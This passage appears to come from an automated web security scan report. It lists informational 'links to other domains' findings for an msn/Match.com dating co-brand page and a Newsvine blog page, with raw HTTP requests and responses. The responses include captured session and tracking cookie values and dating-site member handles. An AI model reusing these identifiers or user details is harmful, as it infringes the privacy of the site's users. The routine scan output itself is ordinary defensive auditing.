</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://n2nh2000.newsvine.com/">JohnS-WRJ-VT</a>
...[SNIP]...
<div class="normal"><a href="http://2wylde4u.newsvine.com/">2Wylde4U</a>
...[SNIP]...
<div class="normal"><a href="http://ray2105828.newsvine.com/">ray-2105828</a>
...[SNIP]...
<div class="normal"><a href="http://concerned2999376.newsvine.com/">concerned-2999376</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://EvilJason.newsvine.com/">Evil Jason</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mtg303.newsvine.com/">Mtg303</a>
...[SNIP]...
<div class="normal"><a href="http://17762999337.newsvine.com/">1776-2999337</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://Freemannogod.newsvine.com/">Freemannogod</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://GooGooNanny.newsvine.com/">GooGooNanny</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://boyle.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/badastronomy/">Bad Astronomy</a>
...[SNIP]...
<li><a href="http://www.collectspace.com/">CollectSpace</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/cosmicvariance/">Cosmic Variance</a>
...[SNIP]...
<li><a href="http://curmudgeons.blogspot.com/">Curmudgeons Corner</a>
...[SNIP]...
<li><a href="http://news.discovery.com/">Discovery News</a>
...[SNIP]...
<li><a href="http://www.dailygrail.com/">The Daily Grail</a>
...[SNIP]...
<li><a href="http://earthsky.org/">EarthSky</a></li><li><a href="http://www.geekpress.com/">GeekPress</a></li><li><a href="http://www.habitablezone.com/space/">Habitable Zone</a>
...[SNIP]...
<li><a href="http://www.hobbyspace.com/">HobbySpace Log</a>
...[SNIP]...
<li><a href="http://www.livescience.com/">LiveScience</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/loom/">The Loom</a></li><li><a href="http://www.nasawatch.com/">NASA Watch</a></li><li><a href="http://www.nasaspaceflight.com/">NASA Spaceflight</a>
...[SNIP]...
<li><a href="http://www.outofthecradle.net/">Out of the Cradle</a>
...[SNIP]...
<li><a href="http://www.scidev.net/">SciDev.net</a></li><li><a href="http://www.scienceblog.com/cms/index.php">Science Blog</a>
...[SNIP]...
<li><a href="http://www.scienceblogs.com/">ScienceBlogs</a>
...[SNIP]...
<li><a href="http://www.signonsandiego.com/news/blogs/science-quest/">Science Quest</a>
...[SNIP]...
<li><a href="http://www.scientificamerican.com/blog/observations/">SciAm Observations</a>
...[SNIP]...
<li><a href="http://seedmagazine.com/">Seed Magazine</a>
...[SNIP]...
<li><a href="http://science.slashdot.org">Slashdot Science</a>
...[SNIP]...
<li><a href="http://www.space.com/">Space.com</a></li><li><a href="http://www.spacedaily.com/">Spaceflight Now</a>
...[SNIP]...
<li><a href="http://spacefellowship.com/">Space Fellowship</a>
...[SNIP]...
<li><a href="http://www.thespacereview.com/">The Space Review</a>
...[SNIP]...
<li><a href="http://www.transterrestrial.com/">Transterrestrial Musings</a>
...[SNIP]...
<li><a href="http://http://www.universetoday.com/">Universe Today</a>
...[SNIP]...
<li><a href="http://www.unmannedspaceflight.com">Unmanned Spaceflight</a>
...[SNIP]...
<li><a href="http://trueslant.com/milesobrien/">Uplink by Miles O'Brien</a>
...[SNIP]...
<li><a href="http://planetary.org/blog">Planetary Society Blog</a>
...[SNIP]...
<li><a href="http://www.sciencenews.org/">Science News</a>
...[SNIP]...
<li><a href="http://www.popularmechanics.com/">Popular Mechanics</a>
...[SNIP]...
<li><a href="http://www.popsci.com/">Popular Science</a>
...[SNIP]...
<li><a href="http://news.sciencemag.org/scienceinsider/">Science Insider</a>
...[SNIP]...
<li><a href="http://nasaengineer.com/">NASAEngineer.com</a>
...[SNIP]...
<li><a href="http://eurekalert.org/">EurekAlert</a></li><li><a href="http://blogs.nature.com/news/thegreatbeyond/">Nature: The Great Beyond</a>
...[SNIP]...
<li><a href="http://www.spacedaily.com/">Space Daily</a>
...[SNIP]...
<li><a href="http://www.spacepolitics.com">Space Politics</a>
...[SNIP]...
<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo"><a href="http://www.thecaseforpluto.com/" title="The Case for Pluto"><img src="http://www.thecaseforpluto.com/cover.jpg" width="85" height="129" align="left" border="0" style="padding:0 10px 10px 0;" /></a>Alan Boyle's first book tells the story of Pluto's ups and downs as well as the discoveries of other dwarf planets in our own solar system and even more alien worlds beyond. <a href="http://www.thecaseforpluto.com/" title="The Case for Pluto">Buy "The Case for Pluto" ...</a>
...[SNIP]...
<div class="avatar"><a href="http://jimseida.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/cycler-1339318757.jpg" width="60" height="60" /></a>
...[SNIP]...
<div class="avatar"><a href="http://john-roach.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/jtroach-2120073942.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&amp;mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.61. http://dating.redacted/cp.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.redacted
Path:   /cp.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /cp.aspx?cpp=/en-us/partner/msn/38028.html&trackingid=526133&bannerid=722762&gc=1&tr=2&keyword=outdoors&gt1=26000 HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:45:57 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/29/2011; expires=Sun, 29-Jan-2012 23:45:55 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/29/2011; domain=match.com; expires=Sun, 29-Jan-2012 23:45:55 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/29/2011&UMID=c57fd076-00eb-4b20-b207-3fcd3f25ac2a; expires=Sun, 29-Jan-2012 23:45:55 GMT; path=/
Set-Cookie: SECU=TID=526133&ESID=6c55d63f-ab4d-469b-88ee-c43dd2c2cfaf&THEME=215; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52522

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4043.20742" rel="st
...[SNIP]...
</script>


<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/google.js"></script>
<script language="javascript" type="text/javascript" src="http://cp.match.com/scripts/jquery.pngFix.js"></script>
...[SNIP]...
</style>
<link href="http://cp.match.com/en-us/partner/msn/38028.css" rel="stylesheet" type="text/css" />
<title>
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />

<!-- BEGIN OMNITURE REPORTING -->
...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div id="pnlButton"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnSearch.gif" width="144" height="29" alt="Search Now &raquo;" class="btnSearch" />
               <input type="hidden" name="po" value="1" id="po" />
...[SNIP]...
<div id="pnlButton"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnSearch.gif" width="144" height="29" alt="Search Now &raquo;" class="btnKeywordSearch" />
               <input type="hidden" name="po" value="1" id="po" />
...[SNIP]...
<a href="/en-us/partner/msn/20400_5.html" target="_blank"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnClickHere.gif" alt="Click Here &raquo;" width="129" height="27" border="0" /></a>
...[SNIP]...
<input id="lookingForZip" type="text" name="zip" maxlength="10"/> <img src="http://cp.match.com/en-us/partner/msn/images/viewPhotosCTA.gif" class="zipKwdSubmit" width="128" height="27" /></div>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/85/78/94808578E.jpeg" alt="Jennie7788" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Jennie7788&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/85/78/94808578E.jpeg" alt="Jennie7788" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/76/24/69817624R.jpeg" alt="cambridge_k" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=cambridge_k&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/76/24/69817624R.jpeg" alt="cambridge_k" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/48/81/78874881A.jpeg" alt="RebeccaWhistler" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=RebeccaWhistler&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/48/81/78874881A.jpeg" alt="RebeccaWhistler" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/57/71/54295771D.jpeg" alt="emcjdccjc" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=emcjdccjc&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/57/71/54295771D.jpeg" alt="emcjdccjc" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/67/39/93586739A.jpeg" alt="423bergh" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=423bergh&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/67/39/93586739A.jpeg" alt="423bergh" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/59/69/91385969O.jpeg" alt="coollowjane" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=coollowjane&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/59/69/91385969O.jpeg" alt="coollowjane" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/70/27/97217027B.jpeg" alt="rachmarie16" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=rachmarie16&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/70/27/97217027B.jpeg" alt="rachmarie16" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/57/61/98085761D.jpeg" alt="Olive2882" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Olive2882&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/57/61/98085761D.jpeg" alt="Olive2882" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/34/25/97343425A.jpeg" alt="cat5518" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=cat5518&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/34/25/97343425A.jpeg" alt="cat5518" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/24/55/97182455G.jpeg" alt="memphis38104" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=memphis38104&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/24/55/97182455G.jpeg" alt="memphis38104" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/67/15/93936715M.jpeg" alt="holidayinspain3" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=holidayinspain3&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/67/15/93936715M.jpeg" alt="holidayinspain3" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/63/91/90146391T.jpeg" alt="natalieD2881" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=natalieD2881&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/63/91/90146391T.jpeg" alt="natalieD2881" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/13/40/96771340A.jpeg" alt="TheOneAndOnly_1_" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=TheOneAndOnly_1_&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/13/40/96771340A.jpeg" alt="TheOneAndOnly_1_" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/83/21/68758321O.jpeg" alt="mar_kl15" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=mar_kl15&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/83/21/68758321O.jpeg" alt="mar_kl15" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/85/15/92818515B.jpeg" alt="forever2911" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=forever2911&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/85/15/92818515B.jpeg" alt="forever2911" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/13/94/80911394A.jpeg" alt="jfm53" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=jfm53&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/13/94/80911394A.jpeg" alt="jfm53" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/13/57/62661357E.jpeg" alt="MK2324" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=MK2324&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/13/57/62661357E.jpeg" alt="MK2324" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/97/35/96829735A.jpeg" alt="liz6919" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=liz6919&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/97/35/96829735A.jpeg" alt="liz6919" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/29/76/98462976A.jpeg" alt="beach_sports77" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=beach_sports77&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/29/76/98462976A.jpeg" alt="beach_sports77" border="0" /></a>
...[SNIP]...
<a href="/qsearch/qsearchdl.aspx?lage=20&uage=30&bd=1&bd=2&bd=3&ex=2&ex=3&ex=4&r2s=1&cpp=floatingreg/msn/default.html" target="_top"><img src="http://images.match.com/s.gif" width="80" height="100" alt="View More Profiles" /></a>
...[SNIP]...
<div id="pnlBtm"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btm.png" width="973" height="8" /></div>
...[SNIP]...

22.62. http://dating.redacted/cp.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.redacted
Path:   /cp.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /cp.aspx?cpp=/en-us/partner/msn/38028.html&trackingid=526133&bannerid=722762&gc=1&tr=2&keyword=outdoors&gt1=26000 HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 16:44:21 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/30/2011; expires=Mon, 30-Jan-2012 16:44:19 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/30/2011; domain=match.com; expires=Mon, 30-Jan-2012 16:44:19 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/30/2011&UMID=2cd4439a-0973-4f98-88d3-792ed5021042; expires=Mon, 30-Jan-2012 16:44:19 GMT; path=/
Set-Cookie: SECU=TID=526133&ESID=2c27fe31-53fc-4ee6-8800-d527196a9fc1&THEME=80; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52438

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4043.20742" rel="st
...[SNIP]...
</script>


<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/google.js"></script>
<script language="javascript" type="text/javascript" src="http://cp.match.com/scripts/jquery.pngFix.js"></script>
...[SNIP]...
</style>
<link href="http://cp.match.com/en-us/partner/msn/38028.css" rel="stylesheet" type="text/css" />
<title>
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />

<!-- BEGIN OMNITURE REPORTING -->
...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div id="pnlButton"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnSearch.gif" width="144" height="29" alt="Search Now &raquo;" class="btnSearch" />
               <input type="hidden" name="po" value="1" id="po" />
...[SNIP]...
<div id="pnlButton"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnSearch.gif" width="144" height="29" alt="Search Now &raquo;" class="btnKeywordSearch" />
               <input type="hidden" name="po" value="1" id="po" />
...[SNIP]...
<a href="/en-us/partner/msn/20400_5.html" target="_blank"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnClickHere.gif" alt="Click Here &raquo;" width="129" height="27" border="0" /></a>
...[SNIP]...
<input id="lookingForZip" type="text" name="zip" maxlength="10"/> <img src="http://cp.match.com/en-us/partner/msn/images/viewPhotosCTA.gif" class="zipKwdSubmit" width="128" height="27" /></div>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/85/78/94808578E.jpeg" alt="Jennie7788" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Jennie7788&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/85/78/94808578E.jpeg" alt="Jennie7788" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/54/69/66035469X.jpeg" alt="SoccerGirl3381" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=SoccerGirl3381&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/54/69/66035469X.jpeg" alt="SoccerGirl3381" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/67/39/93586739A.jpeg" alt="423bergh" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=423bergh&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/67/39/93586739A.jpeg" alt="423bergh" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/59/69/91385969O.jpeg" alt="coollowjane" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=coollowjane&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/59/69/91385969O.jpeg" alt="coollowjane" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/57/61/98085761D.jpeg" alt="Olive2882" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Olive2882&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/57/61/98085761D.jpeg" alt="Olive2882" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/34/25/97343425A.jpeg" alt="cat5518" /></div>
...[SNIP]...
